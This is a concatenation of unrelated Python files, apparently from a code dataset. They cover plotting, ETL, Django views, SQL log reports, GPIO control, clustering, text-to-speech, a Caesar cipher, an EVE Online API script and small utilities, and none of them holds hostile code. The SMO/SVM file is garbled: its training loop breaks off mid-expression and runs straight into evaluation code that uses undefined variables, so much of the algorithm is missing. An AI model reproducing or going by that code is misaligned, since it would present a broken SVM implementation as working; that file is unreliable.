{"seq_id":"136830999","text":"#!/usr/bin/env python\n#\n# pygletplot.py\n#\n\nimport datetime\n\nfrom pyglet.window import Window, mouse\nimport pyglet.app\n\nfrom electrowlib.graphics.glfigure import GLFigure\nfrom electrowlib.graphics.interactive import InteractiveState\n\n\nclass PlotWindow(Window):\n    \"\"\"Subclass of Window that displays an interactive GLFigure\"\"\"\n\n    double_click_time = datetime.timedelta(seconds=0.3)\n    cursor_names = {None:Window.CURSOR_DEFAULT,\n                    'pan':Window.CURSOR_HAND,\n                    'zoom':Window.CURSOR_CROSSHAIR}\n\n    def __init__(self, *args, **kwargs):\n        # Initialise self\n        kwargs['resizable'] = kwargs.get('resizable', True)\n        interactive = kwargs.pop('interactive', False)\n        super(PlotWindow, self).__init__(*args, **kwargs)\n        self._init = False\n        self.last_press = datetime.datetime.now()\n        # Create figure object\n        width, height = self.get_size()\n        self.figure = GLFigure()\n        self.figure.set_rect([0, 0, width, height])\n        # Create cursors used for interactivity\n        self._cursors = {}\n        # dict.items() works on both Python 2 and 3; iteritems() is Python 2 only\n        for k, v in self.cursor_names.items():\n            self._cursors[k] = self.get_system_mouse_cursor(v)\n        # Create interactivity data\n        self.set_interactive(interactive)\n\n    def run(self):\n        pyglet.app.run()\n\n    def on_draw(self):\n        if not self._init:\n            self.figure._initgl()\n            self._init = True\n        self.figure._draw()\n\n    def on_resize(self, width, height):\n        self.figure._resize(width, height)\n\n    def set_interactive(self, interactive):\n        self._interactive = InteractiveState(interactive, self)\n\n    def _set_cursor(self, mode):\n        self.set_mouse_cursor(self._cursors[mode])\n\n    # Manually detect double-clicks\n    def on_mouse_press(self, x, y, button, modifiers):\n        self.on_mouse_down(x, y, button, modifiers)\n        penultimate_press = self.last_press\n        self.last_press = datetime.datetime.now()\n        delta = self.last_press - penultimate_press\n        if button ==
mouse.LEFT and delta < self.double_click_time:\n self.on_double_click(x, y, button, modifiers)\n\n def _point(self, x, y):\n width, height = self.get_size()\n return float(x) / float(width), float(y) / float(height)\n\n def on_mouse_down(self, x, y, button, modifiers):\n if button == mouse.LEFT:\n self._interactive.on_left_down(self._point(x, y))\n\n def on_mouse_release(self, x, y, button, modifiers):\n if button == mouse.LEFT:\n self._interactive.on_left_up(self._point(x, y))\n\n def on_double_click(self, x, y, button, modifiers):\n if button == mouse.LEFT:\n self._interactive.on_left_double_click(self._point(x, y))\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n if buttons & mouse.LEFT:\n self._interactive.on_mouse_drag(self._point(x, y))\n\n def on_mouse_motion(self, x, y, dx, dy):\n self._interactive.on_mouse_move(self._point(x, y))\n\n\nif __name__ == \"__main__\":\n\n import pyglet\n import numpy\n\n window = PlotWindow(interactive=True)\n figure = window.figure\n\n x = numpy.linspace(0, 2*numpy.pi, 1024)\n y = numpy.sin(x) + 0.1 * numpy.random.random(x.shape)\n ax = figure.add_axes([0.1, 0.1, 0.8, 0.8])\n ax.plot(x, y, 'g')\n\n window.run()\n\n","sub_path":"electrowlib/graphics/pyglet_plotwindow.py","file_name":"pyglet_plotwindow.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609132834","text":"from etl.etl_processes.fairs_etl import *\nfrom autohandshake.HandshakeNavigator import HandshakeNavigator\nfrom autohandshake.HandshakeSession import HandshakeSession\nfrom datetime import date, timedelta\n\nif __name__ == '__main__':\n option = -1\n include_time_sensitive = False\n\n print(\"Career Fairs Data Pull\\n\")\n\n while option != '1' and option != '2':\n print(\"Commands:\")\n print(\" - (1) Get yesterday's career fair data\")\n print(\" - (2) Enter a date range for career fair data\\n\")\n\n option = input(\"Please enter a command: \")\n print() # extra newline for formatting\n\n if option == '1':\n end_date = date.today()\n start_date = end_date - timedelta(1)\n start_date = start_date.strftime(\"%Y-%m-%d\")\n end_date = end_date.strftime(\"%Y-%m-%d\")\n elif option == '2':\n start_date = input(\"Please enter a start date: \")\n end_date = input(\"Please enter an end date: \")\n else:\n print(\"Invalid command\\n\")\n\n include_time_sensitive = input(\"Would you like to include time-dependant student data? 
(y / n): \") == \"y\"\n    with HandshakeSession() as browser:\n        navigator = HandshakeNavigator(browser)\n        fairs_etl.run_etl(navigator, start_date, end_date)\n        fairs_employers_etl.run_etl(navigator, start_date, end_date)\n        attendees_etl.run_etl(navigator, start_date, end_date)\n        if include_time_sensitive:\n            attendees_school_years_etl.run_etl(navigator, start_date, end_date)\n            attendees_colleges_etl.run_etl(navigator, start_date, end_date)\n            attendees_academies_etl.run_etl(navigator, start_date, end_date)\n            attendees_majors_etl.run_etl(navigator, start_date, end_date)\n","sub_path":"production_scripts/etl_scripts/get_fairs.py","file_name":"get_fairs.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"224508926","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.db.models import Count, Sum\nfrom django.shortcuts import render, redirect\nfrom smartphones.models import Smartphone, Sale\nfrom django.db.models.functions import TruncMonth\nimport datetime\n\n\n@login_required(login_url='/login/')\ndef index(request):\n    top_brands = Smartphone.objects.values('brand').annotate(num_sales=Count('sale')).order_by('-num_sales')[:3]\n    overall_sales = Sale.objects.count()\n    brands = list(top['brand'] for top in top_brands)\n    brands.append('other')\n    sales = list(top['num_sales'] for top in top_brands)\n    sales.append(overall_sales - sum(sales))\n    today = datetime.datetime.now()\n    sales_current_year = Sale.objects.filter(created_at__year=today.year)\n    sales_by_month = sales_current_year.annotate(month=TruncMonth('created_at')).values('month').annotate(total=Count('id')).order_by('month')\n    total_sales = []\n    j = 0\n    smartphones = Smartphone.objects.all()\n    storages = list(set(smartphone.storage for smartphone in smartphones))\n    top_storages = Smartphone.objects.values('storage').annotate(num_sales=Count('sale')).order_by('storage')\n    for i in range(1, 13):\n        # guard against an empty queryset and against indexing past the last month with data,\n        # and always append a value so every month gets a data point\n        if j < len(sales_by_month) and sales_by_month[j]['month'].month == i:\n            total_sales.append(sales_by_month[j]['total'])\n            j += 1\n        else:\n            total_sales.append(0)\n    context = {\n        'brands': brands,\n        'sales': sales,\n        'total_sales': total_sales,\n        'storages': sorted(storages),\n        'top_storages': list(top['num_sales'] for top in top_storages),\n        'overall_sales': overall_sales,\n        'in_stock': smartphones.count(),\n    }\n    return render(request, 'smartphones/home.html', context)\n\n\ndef login_view(request):\n    if request.method == \"POST\":\n        form = AuthenticationForm(request, data=request.POST)\n        if form.is_valid():\n            username = form.cleaned_data.get('username')\n            password = form.cleaned_data.get('password')\n            user = authenticate(username=username, password=password)\n            if user is not None:\n                login(request, user)\n                messages.info(request, f\"You are now logged in as {username}.\")\n                return redirect('/')\n            else:\n                messages.warning(request, \"Invalid username or password.\")\n                return render(request=request, template_name=\"smartphones/login_new.html\", context={\"form\": form})\n\n        else:\n            messages.warning(request, \"Invalid username or password.\")\n            return render(request=request, template_name=\"smartphones/login_new.html\", context={\"form\": form})\n    form = AuthenticationForm()
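\n    # fall through for GET requests: render a fresh, unbound login form\n    return render(request=request, template_name=\"smartphones/login_new.html\", 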
context={\"form\": form})\n\n\ndef register_view(request):\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n messages.success(request, \"Registration successful.\")\n return redirect('/')\n messages.warning(request, \"Unsuccessful registration. Invalid information.\")\n return render(request=request, template_name=\"smartphones/register_new.html\", context={\"form\": form})\n form = UserCreationForm\n return render(request=request, template_name=\"smartphones/register_new.html\", context={\"form\": form})\n\n\n@login_required(login_url='/login/')\ndef logout_view(request):\n logout(request)\n return redirect('/')\n\n\n@login_required(login_url='/login/')\ndef smartphones_view(request):\n smartphones = Smartphone.objects.all()\n brands = set(smartphone.brand for smartphone in smartphones)\n storages = set(smartphone.storage for smartphone in smartphones)\n context = {\n 'smartphones': smartphones,\n 'brands': sorted(brands),\n 'storages': sorted(storages),\n }\n return render(request, 'smartphones/smartphones_list.html', context)\n\n\n@login_required(login_url='/login/')\ndef filter_view(request):\n if request.method == 'POST':\n checked_brands = request.POST.getlist('brands')\n checked_storages = request.POST.getlist('storages')\n smartphones = Smartphone.objects.all()\n brands = set(smartphone.brand for smartphone in smartphones)\n storages = set(smartphone.storage for smartphone in smartphones)\n if len(checked_brands) != 0:\n smartphones = smartphones.filter(brand__in=checked_brands)\n if len(checked_storages) != 0:\n smartphones = smartphones.filter(storage__in=checked_storages)\n context = {\n 'smartphones': smartphones,\n 'brands': sorted(brands),\n 'checked_brands': checked_brands,\n 'checked_storages': list(map(int, checked_storages)),\n 'storages': sorted(storages),\n }\n return render(request, 'smartphones/smartphones_list_filtered.html', context)\n\n\n@login_required(login_url='/login/')\ndef sales_view(request):\n sales = Sale.objects.all()\n context = {\n 'sales': sales\n }\n return render(request, 'smartphones/tables.html', context)\n","sub_path":"smartphones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"518381510","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n'''\nGiven an array of 2n integers, your task is to group these integers into n pairs of integer, say (a1, b1), (a2, b2), ..., (an, bn) which makes sum of min(ai, bi) for all i from 1 to n as large as possible.\n\nExample 1:\nInput: [1,4,3,2]\n\nOutput: 4\nExplanation: n is 2, and the maximum sum of pairs is 4 = min(1, 2) + min(3, 4).\n'''\n\nclass Solution(object):\n def arrayPairSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n ## solution 1\n # return sum(sorted(nums)[::2])\n\n ## solution 2\n nums = sorted(nums)\n res = 0\n i = 0\n for num in nums:\n \ti += 1\n \tif i % 2 != 0: res += num\n return res\n","sub_path":"zeqing/Array/561.Array_Partition_I.py","file_name":"561.Array_Partition_I.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"60198088","text":"#! 
/usr/bin/env python\nimport psycopg2\n\n\ndef connect(database_name=\"news\"):\n    try:\n        db = psycopg2.connect(\"dbname={}\".format(\n            database_name\n        ))\n        cursor = db.cursor()\n        return db, cursor\n    except:\n        print(\"Connect error\")\n\n\ndef popular_articles():\n    db, cursor = connect()\n    cursor.execute(\"Select title, Count(*) as views from articles Join log On path Like Concat('%', slug, '%') Where status = '200 OK' Group By title Order by views Desc Limit 3;\")\n    articles = cursor.fetchall()\n    print(\"What are the 3 most popular articles of All-time?\")\n    for (name, view) in articles:\n        print(\"    {} - {} views\".format(name, view))\n    db.close()\n\n\ndef popular_authors():\n    db, cursor = connect()\n    cursor.execute(\"Select name, Count(*) as views from articles Join authors on authors.id = articles.author Join log on log.path Like Concat ('%', slug, '%') Where status = '200 OK' Group By name Order By views Desc;\")\n    authors = cursor.fetchall()\n    print(\"Who are most popular authors? Rank by views\")\n    for (name, view) in authors:\n        print(\"    {} - {} views\".format(name, view))\n    db.close()\n\n\ndef percentage_errors():\n    db, cursor = connect()\n    cursor.execute(\"Select date, percentage From errs Where percentage > 1;\")\n    error = cursor.fetchall()\n    print(\"On what day did requests lead to errors greater than 1%?\")\n    for (day, err) in error:\n        print(\"    {0:%B %d, %Y} - {1:.2f} % errors\".format(day, err))\n    db.close()\n\nif __name__ == \"__main__\":\n    popular_articles()\n    popular_authors()\n    percentage_errors()\n","sub_path":"logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"635673472","text":"import os\nimport sys\nimport glob\n\npath_dir = [\"E:\\\\\"]\n# file_name = \"extraction\"\nextensions = [\".mkv\", \".mp4\"]\n\ndir = {\"time\": [\"E:\\\\\"], \"data\": [\"D:\\\\\"]}\n\n# this class is only searching for files in E:\\\nclass search_f:\n    def __init__(self, file_name, path_name):\n        # __init__ cannot return a value; signal an unknown path group with an exception instead\n        if path_name not in dir:\n            raise ValueError(\"unknown path group: \" + path_name)\n        self.path_name = path_name\n        paths = dir[path_name]\n        self.paths = paths\n        self.file_name = file_name\n\n    def find_file(self):\n        for base_path in self.paths:\n            files = os.listdir(base_path)\n            for file in files:\n                if self.file_name in file.lower():\n                    path = os.path.join(base_path, file)\n                    os.startfile(path)\n                    return \"found\"\n        return \"not found\"\n\n    def find_file_glob(self):\n        for base_path in self.paths:\n            for ext in extensions:\n                glob_path = base_path + \"**\\\\*\" + ext\n                # a for loop absorbs StopIteration, which the old bare next() call leaked,\n                # and keeps searching the remaining extensions and base paths\n                for pth_of_file in glob.iglob(glob_path, recursive=True):\n                    if self.file_name in pth_of_file.lower():\n                        os.startfile(pth_of_file)\n                        return \"found\"\n        return \"not found\"\n\n\n# s = search_f(file_name)\n# r = s.find_file_glob()\n# print(r)\n","sub_path":"search_file.py","file_name":"search_file.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"629747706","text":"# Copyright 2017-2019 Lawrence Livermore National Security, LLC and other\n# Hatchet Project Developers.
See the top-level LICENSE file for details.\n#\n# SPDX-License-Identifier: MIT\n\nfrom setuptools import setup\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nsetup(\n name=\"contrib\",\n version=\"0.1.0\",\n description=(\n \"A python package for making stacked area plots of contributions over time.\"\n ),\n url=\"https://github.com/spack/contrib\",\n author=\"Todd Gamblin\",\n author_email=\"tgamblin@llnl.gov\",\n license=\"Apache-2.0 OR MIT\",\n classifiers=[\"Development Status :: 3 - Alpha\"],\n keywords=\"\",\n packages=[\"contrib\", \"contrib.config\"],\n install_requires=[\n \"python-dateutil\",\n \"jsonschema\",\n \"matplotlib\",\n \"pyyaml\",\n \"setuptools\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648159552","text":"import RPi.GPIO as GPIO\nfrom time import sleep\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nenable = 18\nHinputC = 23\nHinputCC = 24\ntrnsC = 20\ntrnsCC = 21\nresponseC = 26\nresponseCC = 19\n\nGPIO.setup(enable,GPIO.OUT)\nGPIO.setup(HinputC,GPIO.OUT)\nGPIO.setup(HinputCC,GPIO.OUT)\nGPIO.setup(trnsC,GPIO.OUT)\nGPIO.setup(trnsCC,GPIO.OUT)\nGPIO.setup(responseC,GPIO.IN)\nGPIO.setup(responseCC,GPIO.IN)\n\ndef stop():\n GPIO.output(HinputC,0)\n GPIO.output(HinputCC,0)\n GPIO.output(trnsC,0)\n GPIO.output(trnsCC,0)\n\n\ndef PolarRun(reverse):\n GPIO.output(HinputC,(reverse+1)%2)\n GPIO.output(trnsC,(reverse+1)%2)\n GPIO.output(HinputCC,reverse) \n GPIO.output(trnsCC,reverse)\n\ndef listener(reverse):\n if reverse:\n if GPIO.input(responseCC)==1:\n return True\n else:\n if GPIO.input(responseC)==1:\n return True\n return False\n\nprint(\"setting defaults\")\nstop()\n\nprint(\"Enableing H-bridge\")\n\nGPIO.output(enable,1)\n\ndef testRun(runs):\n sleep(1)\n print(\"starting test\")\n sleep(1)\n Counter = 0\n for i in range(runs):\n PolarRun(i%2)\n sleep(0.8)\n response = listener(i%2)\n print(\"Current flowing currectly: %s\" % (response))\n if response:\n Counter+=1\n sleep(0.2)\n stop()\n print(\"I got %s/%s possible responses\" % (Counter,runs))\t\n print(\"Turning Rocket off\")\n if Counter==runs:\n return True\n else:\n return False\n\ndef main():\n PolarRun(0)\n while listener(0):\n pass\n stop()\n if testRun(6):\n main()\n\nif testRun(6):\n main()\nGPIO.cleanup()\n","sub_path":"code/LaunchCodes.py","file_name":"LaunchCodes.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"25464521","text":"from sklearn.cluster import KMeans\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport re\nfrom sklearn import metrics\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.cluster import DBSCAN\nfrom funcs import *\nfrom sklearn.datasets.samples_generator import make_blobs\n\nclass Kmeans:\n\tdef __init__(self, k, iter):\n\t\tX, y_true = make_blobs(n_samples=300, centers=4,\n\t\tcluster_std=0.60, random_state=0)\n\t\tself.k = k\n\t\tself.iter = iter\n\t\t#feats, labs = read('cbf')\n\t\tfeats, labs = X, y_true\n\t\tself.feats = feats\n\t\tself.labs = labs\n\t\ttmp = np.random.rand(self.k,1)\n\t\tself.centres = []\n\t\tfor itm in tmp:\n\t\t\tval = int(itm[0]*len(feats))\n\t\t\tif val in self.centres: self.centres.append(val+1)\n\t\t\telse: self.centres.append(val)\n\t\tself.clusters = []\n\n\tdef getCentre(self, feat):\n\t\tmindist = 
10000000.\n\t\tidx = -1\n\t\tfor centre in range(len(self.centres)):\n\t\t\t# self.centres holds feature vectors once fit() has converted the initial indices\n\t\t\tdist = euclidean(feat, self.centres[centre])\n\t\t\tif dist < mindist: mindist = dist; idx = centre\n\t\treturn idx\n\n\tdef fit(self):\n\t\t# the constructor stored sample indices; turn them into actual centre vectors first\n\t\t# (assumes funcs.euclidean accepts any pair of equal-length sequences)\n\t\tself.centres = [self.feats[i] for i in self.centres]\n\t\tclusters = [[] for i in range(self.k)]\n\t\tfor _ in range(self.iter):\n\t\t\tclusters = [[] for i in range(self.k)]\n\t\t\tfor feat in range(len(self.feats)):\n\t\t\t\tclusters[self.getCentre(self.feats[feat])].append(feat)\n\t\t\t# recompute each centre as the mean of the samples assigned to it\n\t\t\tfor centre in range(len(self.centres)):\n\t\t\t\tif not clusters[centre]:\n\t\t\t\t\tcontinue\n\t\t\t\tnewc = []\n\t\t\t\tfor i in range(len(self.feats[0])):\n\t\t\t\t\ttotal = 0.\n\t\t\t\t\tfor j in clusters[centre]:\n\t\t\t\t\t\ttotal += self.feats[j][i]\n\t\t\t\t\tnewc.append(total / len(clusters[centre]))\n\t\t\t\tself.centres[centre] = newc\n\t\t# record the final hard assignment of every sample to its cluster\n\t\tself.clusters = [0] * len(self.feats)\n\t\tfor key in range(len(clusters)):\n\t\t\tfor itm in clusters[key]:\n\t\t\t\tself.clusters[itm] = key\n\nif __name__ == \"__main__\":\n\tinst = Kmeans(4, 10)\n\tinst.fit()\n\tprint('Kmeans (dtwdist):')\n\tfeats, labs = read('cbf')\n\n\n\n\tprint('The end...')\n","sub_path":"code/code/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"464522328","text":"import os\nimport numpy as np\nfrom pathlib import Path\nimport tensorflow as tf \nfrom scipy.io import wavfile\n\nfrom .tensorflow_tts.processor import BakerProcessor\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\nasset_dir = Path(__file__).parent / \"asset\"\n\n\nclass TTS():\n    def __init__(self, text2mel_name=\"FASTSPEECH2\"):\n        \"\"\"text2mel_name: [\"FASTSPEECH2\", \"TACOTRON\"] \"\"\"\n        self.sample_rate = 24000\n        self.processor = BakerProcessor(\n            data_dir=None, loaded_mapper_path=asset_dir / \"baker_mapper.json\")\n        self.text2mel_name = text2mel_name\n        self.acoustic = tf.lite.Interpreter(model_path=str(asset_dir / 'fastspeech2_quan.tflite'))\n        self.vocoder = tf.lite.Interpreter(model_path=str(asset_dir / 'mb_melgan.tflite'))\n\n    def prepare_input(self, input_ids):\n        input_ids = np.expand_dims(np.array(input_ids, np.int32), 0)\n        if self.text2mel_name == \"TACOTRON\":\n            return (input_ids,\n                    np.array([input_ids.shape[1]], np.int32),\n                    np.array([0], np.int32),)\n        elif self.text2mel_name == \"FASTSPEECH2\":\n            return (input_ids,\n                    np.array([0], np.int32),\n                    np.array([1.0], np.float32),\n                    np.array([1.0], np.float32),\n                    np.array([1.0], np.float32),)\n\n    def text2mel(self, input_text):\n        input_details = self.acoustic.get_input_details()\n        output_details = self.acoustic.get_output_details()\n        input_ids = self.processor.text_to_sequence(input_text, inference=True)\n\n        self.acoustic.resize_tensor_input(\n            input_details[0]['index'], [1, len(input_ids)])\n        self.acoustic.allocate_tensors()\n\n        input_data = self.prepare_input(input_ids)\n        for i, detail in enumerate(input_details):\n            self.acoustic.set_tensor(detail['index'], input_data[i])\n        self.acoustic.invoke()\n\n        return self.acoustic.get_tensor(output_details[1]['index'])\n\n    def mel2audio(self, mel):\n        input_details = self.vocoder.get_input_details()\n        output_details = self.vocoder.get_output_details()\n        self.vocoder.resize_tensor_input(input_details[0]['index'], mel.shape)\n        self.vocoder.allocate_tensors()\n        self.vocoder.set_tensor(input_details[0]['index'], mel)\n        self.vocoder.invoke()\n\n        return self.vocoder.get_tensor(output_details[0]['index'])[0, :, 0]\n\n    def synthesis(self, text):\n        \"\"\" synthesize text to audio\n\n        Args:\n            text (str)\n        Returns:\n            ndarray: audio\n        \"\"\"
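\n        # two-stage pipeline: the acoustic model predicts a mel spectrogram, then the vocoder renders the waveform\n        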
mel = self.text2mel(text)\n        audio = self.mel2audio(mel)\n        return audio\n\n    def frontend(self, text):\n        \"\"\" return normalize_text, phoneme_seq for debug\n\n        Args:\n            text (str)\n        Returns:\n            (tuple): tuple containing:\n\n                normalize_text (str): text after text_normalize\n                phoneme (str): \" \".join(phones)\n        \"\"\"\n        return self.processor.text_to_phone(text)\n\n    def text2wav(self, text, wavpath):\n        \"\"\"synthesize text and save it to a wav file\"\"\"\n        audio = self.synthesis(text)\n        \n        wavfile.write(wavpath, self.sample_rate, audio)\n        ","sub_path":"zhtts/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"62567271","text":"def encoder(key):\n    on = 0\n    encodedString = \"\"\n    while True:\n        newLetter = chr(ord(userInput[on]) + int(key))\n        encodedString = encodedString + newLetter\n        on = on + 1\n        if on == len(userInput):\n            break\n    print(encodedString)\n\ndef decoder(key):\n    on = 0\n    decodedString = \"\"\n    while True:\n        newLetter = chr(ord(encodedString[on]) - key)\n        decodedString = decodedString + newLetter\n        on = on + 1\n        if on == len(encodedString):\n            break\n    return decodedString\n\nprint(\"Would you like to encode or decode?\")\nanswer = input()\nif answer == 'encode':\n    print(\"Enter a word or sentence to encode\")\n    userInput = input()\n    print(\"In what key would you like to encode in?\")\n    n = input()\n    encoder(n)\nif answer == 'decode':\n    print(\"Enter a word or sentence to decode.\")\n    encodedString = input()\n    for n in range(1,12):\n        print('In key ' + str(n) + ' the message is:')\n        print(decoder(n))\n","sub_path":"Python/Encoding/ArjunPEncoderDecoder.py","file_name":"ArjunPEncoderDecoder.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"381239943","text":"from app.libs.shared_flow import *\n\n\ndef _get_type_id(type_id):\n    return requests.get(f\"https://esi.evetech.net/latest/universe/types/{type_id}/\").json()\n\n\ndef main():\n    \"\"\" Takes you through a local example of the OAuth 2.0 web flow.\"\"\"\n\n    # read the cached credentials, closing both files promptly\n    with open(\"access_token.txt\", \"r\") as access_token_file:\n        token = access_token_file.read()\n    with open(\"character_id.txt\", \"r\") as character_id_file:\n        character_id = character_id_file.read()\n\n    headers = {\n        \"Authorization\": \"Bearer {}\".format(token)\n    }\n\n    blueprint_path = (\"https://esi.evetech.net/latest/characters/{}/assets/\".format(character_id))\n    res = requests.get(blueprint_path, headers=headers)\n    json = res.json()\n    for item in json:\n        if item['location_flag'] == \"Cargo\":\n            print(\"CARGO: \" + _get_type_id(item['type_id'])['name'])\n        else:\n            print(item)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"app/Eve.py","file_name":"Eve.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"278025414","text":"\n# Support Vector Machine: SMO\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io as scio\nfrom sklearn.svm import LinearSVC\n\n\n# Calculates the dual of the Error\ndef dual(K, y, b, alpha, i):\n    temp = np.multiply(alpha, y)\n    return temp.T * K[:, i] + b\n\n\n# Computes Eta value\ndef compute_eta(i, j, K):\n    return 2 * K[i, j] - K[i, i] - K[j, j]\n\n\n# Helper to calculate new alphaj value\ndef new_alphaj_value(alpha, y, Ei, Ej, eta, L, H):\n    temp = alpha - (y * (Ei - Ej)) / eta
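\n    # clip the unconstrained optimum back into the box [L, H] imposed by the dual constraints\n    if temp > H:\n        return H\n    elif temp < L:\n        return 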
L\n    else:\n        return temp\n\n\n# Helper to compute b\ndef compute_b(b1, b2, alphai, alphaj, C):\n    if 0 < alphai < C:\n        return b1\n    elif 0 < alphaj < C:\n        return b2\n    else:\n        return (b1 + b2) / 2\n\n\n# Simplified smo algorithm\ndef smo(X, y, C, tolerance, max_passes, K):\n    X = X[: , 1:]\n    alpha = np.matrix(np.zeros(X.shape[0]))\n    alpha = alpha.T\n    b = 0\n    passes = 0\n    while passes < max_passes:\n        num_changed_alphas = 0\n        for i in range(len(X)):\n            Ei = dual(K, y, b, alpha, i) - y[i]\n            if (y[i] * Ei < -tolerance and alpha[i] < C) or (y[i] * Ei > tolerance and alpha[i] > 0):\n                j = np.random.choice(len(X))\n                while j == i:\n                    j = np.random.choice(len(X))\n\n                Ej = dual(K, y, b, alpha, j) - y[j]\n                old_alpha_i = alpha.item(i)\n                old_alpha_j = alpha.item(j)\n\n                if y[i] != y[j]:\n                    L = max(0, alpha[j] - alpha[i])\n                    H = min(C, C + alpha[j] - alpha[i])\n                else:\n                    L = max(0, alpha[i] + alpha[j] - C)\n                    H = min(C, alpha[i] + alpha[j])\n\n                if L == H:\n                    continue\n\n                eta = compute_eta(i, j, K)\n                if eta >= 0:\n                    continue\n\n                alpha[j] = new_alphaj_value(alpha[j], y[j], Ei, Ej, eta, L, H)\n\n                if abs(alpha[j] - old_alpha_j) < 0.00001:\n                    continue\n\n                alpha[i] = alpha[i] + (y[i] * y[j] * (old_alpha_j - alpha[j]))\n\n#                 # Compute b1 and b2\n#                 b_1 = b - Ei - y[i]*(alpha[i] - old_alpha_i)* K[i,i] - y[j] *(alpha[j] - old_alpha_j)*K[i,j]\n#                 b_2 = b - Ej - y[i]*(alpha[i] - old_alpha_i)* K[i,j] - y[j] *(alpha[j] - old_alpha_j)*K[j,j]\n\n#                 b = b_1 if (alpha[i]>0 and alpha[i]<C) else b_2 if (alpha[j]>0 and alpha[j]<C) else (b_1 + b_2) / 2\n\n    print(\"<---------------CLASSIFICATION USING SMO--------------->\")\n    print(\"FOR TRAINING SET\")\n    classification_error_print(X_train, y_train, theta_smo)\n\n    print()\n    print(\"FOR TEST SET\")\n    classification_error_print(X_test, y_test, theta_smo)\n\n    # Plots prediction\n    plotPrediction(X_train, y_train, theta_smo, \"training set\")\n    plotPrediction(X_test, y_test, theta_smo, \"test set\")\n\n    #SKLEARN\n    clf = LinearSVC(random_state=0)\n    clf.fit(X_train, y_train)\n    clf.score(X_train, y_train)\n    print()\n    print(\"<---------------CLASSIFICATION USING SKLEARN SVM--------------->\")\n    print(\"FOR TRAINING SET\")\n    classification_error_print_sklearn(clf, X_train, y_train)\n    print()\n    print(\"FOR TEST SET\")\n    classification_error_print_sklearn(clf, X_test, y_test)\n    theta_smo_sklearn = clf.coef_\n\n    plotPrediction(X_train, y_train, theta_smo_sklearn, \"training set\")\n    plotPrediction(X_test, y_test, theta_smo_sklearn, \"test set\")\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"SVM/SVMsmo.py","file_name":"SVMsmo.py","file_ext":"py","file_size_in_byte":8250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"341027994","text":"#!/usr/bin/env python\nimport sys\nimport subprocess\nfrom os.path import expanduser\n\nif len(sys.argv) == 3:\n    if sys.argv[1] == \"add\":\n        f = sys.argv[2]
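\n        # derive the install name: drop the extension so the command is invoked by its bare name\n        if '.' 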
in f:\n            dest = f[:f.find('.')]\n        else:\n            dest = f\n\n        commands = [\n            [\"chmod\", \"+x\", f],\n            [\"cp\", f, expanduser(\"~/.local/bin/\")+dest]\n        ]\n        for command in commands:\n            subprocess.run(command)\n    elif sys.argv[1] == \"del\":\n        f = sys.argv[2]\n        command = [\"rm\", expanduser(\"~/.local/bin/\")+f]\n        subprocess.run(command)\nelse:\n    print(\"This command needs 2 arguments: option and file\")\n    print(\"options:\")\n    print(\"add \\t add file to path\")\n    print(\"del \\t delete file from path\")\n","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
